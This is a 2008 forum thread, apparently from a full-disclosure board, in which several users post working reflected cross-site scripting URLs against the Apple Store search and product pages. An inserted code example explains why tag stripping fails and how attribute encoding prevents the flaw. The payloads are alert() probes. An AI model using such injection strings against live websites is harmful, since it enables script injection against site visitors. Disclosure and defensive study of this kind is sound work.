Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
store.apple.com xss
Posted by: Kyo
Date: July 18, 2008 01:28PM

I emailed Apple twice about an issue on the Apple store search. They did not fix it for over a MONTH and never mailed me back either. They "fixed" it now, but they did a lousy job at it.

httx://store.apple.com/us/search?find="+onmouseover="alert(1)"

This will not work if you urlencode the "

Anyway, originally it would allow anything; now it strips tags, but it will allow attribute-based exploits, so knock yourself out.

The reason I'm disclosing this now is because I really can't be bothered to run after Apple if they refuse to reply in a bearable time span or follow my advice.



Edited 3 time(s). Last edit at 07/18/2008 01:30PM by Kyo.
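
Added example, not part of the post above and not Apple's code: why a filter that only strips tags leaves a quoted attribute open to the query string in the post, next to output encoding for the attribute context. The search-box template and all function names are assumptions made for illustration.

```javascript
// Added illustration. The template, function names and filter are assumptions;
// the thread does not show Apple's server-side code.

// The kind of fix the post describes: delete anything shaped like a tag.
function stripTags(s) {
  return s.replace(/<[^>]*>/g, "");
}

// Output encoding for a quoted attribute value: every character that could end
// the value or start markup becomes a numeric character reference.
function encodeAttr(s) {
  return s.replace(/[&<>"'`=]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Hypothetical search box that echoes the query back into value="...".
function renderSearchBox(term, filter) {
  return '<input type="text" name="find" value="' + filter(term) + '">';
}

// Small scanner for one start tag: lists the attribute names a browser would
// see, so the effect of each filter can be checked without a DOM.
function attributeNames(tagHtml) {
  const inner = tagHtml.replace(/^<\w+/, "").replace(/>$/, "");
  const attr = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>`]+))?/g;
  return Array.from(inner.matchAll(attr), (m) => m[1].toLowerCase());
}

// Attributes that register script, e.g. onmouseover.
function eventHandlers(tagHtml) {
  return attributeNames(tagHtml).filter((n) => n.startsWith("on"));
}

// Query string from the first post; "+" decodes to a space.
const term = new URLSearchParams('find="+onmouseover="alert(1)"').get("find");

const stripped = renderSearchBox(term, stripTags);  // tag stripping only
const encoded = renderSearchBox(term, encodeAttr);  // attribute encoding

console.log(stripped, eventHandlers(stripped));
console.log(encoded, eventHandlers(encoded));
```

The input contains no tag, so `stripTags` returns it unchanged and the unescaped quote closes `value`; with `encodeAttr` the same input stays inside the one attribute.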

Re: store.apple.com xss
Posted by: thrill
Date: July 18, 2008 03:28PM

shweet!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: store.apple.com xss
Posted by: rsnake
Date: August 03, 2008 10:21PM

Still works. Seriously. How lame! PCI anyone?

- RSnake
Gotta love it. http://ha.ckers.org

Re: store.apple.com xss
Posted by: Jiu
Date: August 04, 2008 04:20PM

http://store.apple.com/us/search?find=%22%3E%3Cimg%20src=%22.%22%20onerror=%22alert(1)%22%3Cinput

without onmouseover ^^
works in Firefox 2



Edited 1 time(s). Last edit at 08/04/2008 04:20PM by Jiu.

Re: store.apple.com xss
Posted by: Kyo
Date: August 04, 2008 08:27PM

Huh, looks like my browser was just being weird or something. They didn't fix it...

Re: store.apple.com xss
Posted by: TheInsider
Date: December 24, 2008 08:16PM

Nice guys!
Both patched, check this out...

http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert("The apple didn't fell far from the last apple")</script><div id="

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!

Re: store.apple.com xss
Posted by: DoctorDan
Date: December 25, 2008 10:34PM

Not okay! Good finds.

-Dan
